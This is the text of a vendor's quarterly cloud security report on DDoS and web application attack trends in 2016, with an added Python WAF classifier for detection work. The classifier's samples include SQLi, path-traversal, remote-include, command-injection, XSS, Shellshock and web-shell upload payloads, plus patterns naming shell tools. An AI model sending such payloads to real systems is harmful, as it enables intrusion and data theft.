DDoS attack patterns across the APJ cloud market. Samuel Chen CCIE#9607 Enterprise Security Architect, Manager - APJ

www.cloudsec.com/tw

DDoS attacks from Q1 2014 to Q1 2016: Each dot represents an individual DDoS attack, and each interval on the axis covers a 10-fold increase in attack size. The boxes mark the interquartile range, the middle 50% of attacks.

DDoS Attack Median Packet Rate and IQR: While six DDoS attacks in Q1 2016 exceeded 30 Mpps, more than half of the attacks measured 1 Mpps or less. The graph shows the packet rate for the middle 50% of DDoS attacks from Q1 2014 to Q1 2016.

Percentage change compared to Q1 2015:
- Total DDoS attacks: 125%
- Infrastructure layer attacks: 142%
- Average attack duration: 35%
- Total attacks > 100 Gbps: 138%

In Q1 2016, repeat DDoS attacks remained the norm, with an average of 29 attacks per targeted customer. One target suffered 283 attacks, an average of three per day for the quarter.

Percentage change compared to Q4 2015:
- Total DDoS attacks: 23%
- Repeat attacks per target: 107%
- Infrastructure layer attacks: 23%
- Average attack duration: 8%
- Total attacks > 100 Gbps: 280%

Largest attack: 289 Gbps. Most packets per second: 67 Mpps.

In Q1 2016, stresser/booter-based botnets remained the source of the vast majority of DDoS attacks observed by Akamai. These tools rely heavily on reflection techniques to generate their traffic.

Types of DDoS Attacks and Relative Distribution in Q1 2016: UDP Fragment, DNS, NTP and CHARGEN attack vectors made up almost 70% of the attacks.

10 Most Frequent Attack Vectors by Quarter: TCP Anomaly attacks remained among the top 10 vectors, having first edged out ICMP attacks in Q4 2015.

Avoid data theft and downtime by extending the security perimeter outside the data center, and protect against the increasing frequency, scale and sophistication of web attacks.

Multi-Vector DDoS Attacks Are the Norm: Multi-vector attacks accounted for 59% of DDoS activity in Q1 2016, up from 56% in Q4 2015.

Reflection-Based DDoS Attacks, Q1 2015 to Q1 2016: SSDP, NTP, DNS and CHARGEN have consistently been the most common reflection attack vectors (left axis). The use of reflection attacks has increased dramatically since Q1 2015 (right axis).

DDoS Attack Frequency by Industry

Average Number of DDoS Attacks per Target: In Q1 2016 there were an average of 29 DDoS attacks per target, up from 24 in the previous quarter. One target was hit with 283 attacks, averaging more than 3 attacks per day.

Top 10 Source Countries for DDoS Attacks in Q1 2016: China was the top source of non-spoofed DDoS attacks in the first quarter, followed by the US.

Top 5 Source Countries for DDoS Attacks, Q1 2015 to Q1 2016: China has been the top source country for DDoS attacks since Q1 2015, with the exception of Q3 2015, when the UK took the top spot.

Mega Attacks > 100 Gbps in Q1 2016: Nineteen attacks exceeded 100 Gbps in Q1 2016, with the largest hitting the software and technology, gaming, and media and entertainment sectors.

Mega Attacks > 30 Mpps in Q1 2016: Of the six attacks exceeding 30 Mpps in Q1 2016, the four largest targeted the software and technology sector.

Spotlight: Attack traffic distribution across scrubbing center locations, with Frankfurt absorbing the highest peak bandwidth of 104 Gbps.

Web Application Attack Analysis

9 Common Web Attack Vectors

- SQLi / SQL injection: user-supplied content is passed into an SQL statement without proper validation.
- LFI / Local file inclusion: gains unauthorized read access to local files on the web server.
- RFI / Remote file inclusion: abuses the dynamic file-include mechanism available in many programming languages to load remote malicious code into the victim web application.
- PHPi / PHP injection: injects PHP code that is then executed by the PHP interpreter.
- CMDi / Command injection: executes arbitrary shell commands on the target system.
- JAVAi / Java injection: abuses the Object Graph Navigation Language (OGNL), a Java expression language. Popular because of recent flaws in the Java-based Struts framework, which uses OGNL extensively.
- MFU / Malicious file upload (or unrestricted file upload): uploads unauthorized files to the target application that may later be used to gain full control over the system.
- XSS / Cross-site scripting: injects client-side code into web pages viewed by others, whose browsers execute the code within the security context (or zone) of the hosting web site; the code can read, modify and/or transmit data accessible to the browser.
- Shellshock (disclosed in September 2014): a vulnerability in the Bash shell (the default shell for Linux and Mac OS X) that allows arbitrary command execution by a remote attacker.
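The "attack triggers" counted on the following slides are WAF rules firing on individual requests and attributing each to one of the vectors above. The block below is an added example, not code from the deck and not Akamai's rule set: a small trigger classifier that URL-decodes constructed request lines (repeatedly, so double-encoded payloads are caught) and labels them SQLi, LFI, RFI, PHPi, CMDi, XSS, Shellshock or MFU. The signatures are deliberately minimal stand-ins for real rules, the match ordering is an assumption, and every request is constructed.

```python
"""Classify constructed HTTP requests by the web attack vector a WAF
"trigger" would attribute them to.

Added example, not from the original deck and not Akamai's rule set.
The signatures are deliberately small stand-ins for real WAF rules, the
ordering is an assumption (most specific first), and every request
below is constructed.
"""
import re
from collections import Counter
from urllib.parse import unquote_plus

# Checked in order; the first match wins. Order matters: a command
# injection payload often also names /etc/passwd, so CMDi runs before
# LFI, and the Shellshock header is tested before the generic patterns.
SIGNATURES = [
    ("Shellshock", re.compile(r"\(\)\s*\{\s*:;\s*\};")),
    ("RFI", re.compile(r"=\s*(?:https?|ftp)://", re.I)),
    ("CMDi", re.compile(r"[;|`]\s*(?:cat|ls|id|whoami|wget|curl|nc|bash|sh)\b|\$\([^)]*\)", re.I)),
    ("PHPi", re.compile(r"<\?php|\b(?:eval|assert|base64_decode)\s*\(", re.I)),
    ("LFI", re.compile(r"(?:\.\./){2,}|/etc/passwd|php://(?:filter|input)", re.I)),
    ("SQLi", re.compile(r"'\s*(?:or|and)\s+[\w'\"]+\s*=|\bunion\s+(?:all\s+)?select\b"
                        r"|;\s*(?:drop|insert|update|delete)\b", re.I)),
    ("XSS", re.compile(r"<\s*/?script\b|javascript:|\bon(?:load|error|click|mouseover|focus)\s*=", re.I)),
    ("MFU", re.compile(r'filename="[^"]*\.(?:php\d?|phtml|jsp|aspx?|cgi)"', re.I)),
]


def normalize(text, max_rounds=3):
    """URL-decode until the text stops changing, so a double-encoded
    payload (%2527 -> %27 -> ') reaches the matcher in plain form."""
    for _ in range(max_rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text


def classify_request(request):
    """Return the first vector whose signature matches the request's
    target, header values or body, or None if nothing fires."""
    parts = [request["target"]]
    parts += list(request.get("headers", {}).values())
    parts.append(request.get("body", ""))
    text = normalize("\n".join(parts))
    for vector, pattern in SIGNATURES:
        if pattern.search(text):
            return vector
    return None


def triggers_by_vector(requests):
    """Count triggers per vector, the way the deck's 'attack triggers'
    charts are built (here without the industry dimension)."""
    return Counter(v for v in map(classify_request, requests) if v is not None)


def _req(method, target, headers=None, body=""):
    return {"method": method, "target": target, "headers": headers or {}, "body": body}


# Constructed requests; the hostnames and addresses are documentation ranges.
SAMPLE_REQUESTS = [
    _req("GET", "/product?id=1%27%20OR%20%271%27%3D%271"),                   # SQLi
    _req("GET", "/product?id=1%2527%2520OR%25201%253D1"),                    # SQLi, double-encoded
    _req("GET", "/index.php?page=../../../../etc/passwd"),                    # LFI
    _req("GET", "/index.php?page=http://198.51.100.7/shell.txt"),            # RFI
    _req("GET", "/index.php?cmd=%3C%3Fphp%20system%28%27id%27%29%3B%20%3F%3E"),  # PHPi
    _req("GET", "/ping?host=127.0.0.1%3Bcat%20%2Fetc%2Fpasswd"),             # CMDi
    _req("GET", "/search?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E"),            # XSS
    _req("GET", "/cgi-bin/status", {"User-Agent": "() { :; }; /bin/bash -c 'id'"}),  # Shellshock
    _req("POST", "/upload", {"Content-Type": "multipart/form-data; boundary=x"},
         'Content-Disposition: form-data; name="file"; filename="shell.php"\r\n'
         "Content-Type: image/gif\r\n\r\nGIF89a"),                             # MFU
    _req("GET", "/api/items?page=2&sort=name", {"User-Agent": "Mozilla/5.0"}),  # benign
]

if __name__ == "__main__":
    for r in SAMPLE_REQUESTS:
        print(f"{r['method']} {r['target'][:48]:<48} -> {classify_request(r)}")
    print(triggers_by_vector(SAMPLE_REQUESTS))
```

Two things the example is built to show: ordering decides attribution when one payload matches several rules (the command-injection line also contains /etc/passwd), and decoding has to be repeated or an attacker simply encodes twice. Real WAFs normalise far more than URL encoding (Unicode, HTML entities, comment stripping) and score rules rather than stopping at the first hit.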

Web Application Attack Vectors Over HTTP, Q1 2016: SQLi, LFI and XSS were the most prevalent attack vectors; together they accounted for more than 90% of the attacks over HTTP.

Attacks Over HTTPS, Q1 2016 30% of the web application attacks observed in Q1 2016 were over encrypted (HTTPS) connections, an increase from only 11% the previous quarter.

Top 10 Source Countries for Web Application Attacks, Q1 2016

Top 10 Target Countries for Web Application Attacks, Q1 2016 US-hosted web sites were targeted six times more often than the second most popular target country, Brazil.

Web Application Attacks by Industry, Q1 2016 As in previous quarters, the retail industry was most frequently targeted with web application attacks in Q1 2016.

Web Application Attack Triggers by Industry, Q1 2016 94% of the attack triggers for web application attacks in Q1 2016 targeted just eight industries (shown in black).

SQLi and LFI Attack Triggers by Target Industry, Q1 2016

Shellshock, XSS, and MFU Attack Triggers by Industry

CMDI, PHPI, and RFI Attack Triggers by Industry

24 Hour Bot Traffic Snapshot

Akamai Intelligent Platform Firewall Activity

Reflector Activity The location of leveraged Internet devices used in reflection-based DDoS attacks during Q1 2016 was concentrated in the US, Asia, and Europe.

Top 10 Reflection Sources by ASN

DDoS Reflection Sources

Cloud Security Resources

Q1 2016 Cloud Security Resources
- Scraper and Bot Series: When Good Bots Go Bad
- #OpKillingBay Expands Attacks
- BillGates Malware Used in DDoS Attacks
- Akamai Responds to Forwarding-Loop Issue
- IKE/IKEv2 Ripe for DDoS Abuse
- Akamai and the Glibc Vulnerability (CVE-2015-7547)
- Akamai and the DROWN Vulnerability
- DNSSEC Targeted in DNS Reflection, Amplification DDoS Attacks
- Akamai Customers Not Vulnerable to SLOTH
- How Web Applications Become SEO Pawns
